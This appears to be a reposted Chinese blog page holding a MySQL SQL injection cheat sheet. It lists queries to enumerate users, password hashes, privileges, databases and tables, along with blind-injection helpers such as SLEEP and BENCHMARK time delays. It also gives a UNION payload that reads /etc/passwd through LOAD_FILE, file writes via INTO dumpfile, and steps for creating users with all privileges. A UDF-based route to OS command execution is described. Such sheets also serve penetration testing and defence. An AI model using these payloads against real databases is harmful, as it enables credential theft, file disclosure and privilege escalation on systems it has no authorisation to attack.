mysql脚本注入_MySQL SQL 常见注入脚本

Version

SELECT @@version

Comments

SELECT 1; #comment

SELECT /*comment*/1;

Current User

SELECT user();

SELECT system_user();

List Users

SELECT user FROM mysql .user; -- priv

List Password Hashes

SELECT host, user, password FROM mysql.user; -- priv

Password Cracker

John the Ripper will crack MySQL password hashes.

List Privileges

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs

SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs

SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)

SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns

List DBA Accounts

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';

SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv

Current Database

SELECT database()

List Databases

SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0

SELECT distinct(db) FROM mysql.db -- priv

List Columns

SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

List Tables

SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

Find Tables From Column Name

SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find table which have a column called 'username'

Select Nth Row

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0

Select Nth Char

SELECT substr('abcd', 3, 1); # returns c

Bitwise AND

SELECT 6 & 2; # returns 2

SELECT 6 & 1; # returns 0

ASCII Value -> Char

SELECT char(65); # returns A

Char -> ASCII Value

SELECT ascii('A'); # returns 65

Casting

SELECT cast('1' AS unsigned integer);

SELECT cast('123' AS char);

String Concatenation

SELECT CONCAT('A','B'); #returns AB

SELECT CONCAT('A','B','C'); # returns ABC

If Statement

SELECT if(1=1,'foo','bar'); -- returns 'foo'

Case Statement

SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A

Avoiding Quotes

SELECT 0x414243; # returns ABC

Time Delay

SELECT BENCHMARK(1000000,MD5('A'));

SELECT SLEEP(5); # >= 5.0.12

Make DNS Requests

Impossible?

Command Execution

If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar).  The .so file should contain a User Defined Function (UDF).  raptor_udf.c explains exactly how you go about this.  Remember to compile for the target architecture which may or may not be the same as your attack platform.

Local File Access

...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files.

SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system

Hostname, IP Address

Impossible?

Create Users

CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv

Delete Users

DROP USER test1; -- priv

Make User DBA

GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv

Location of DB files

SELECT @@datadir;

Default/System Databases

information_schema (>= mysql 5.0) mysql

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值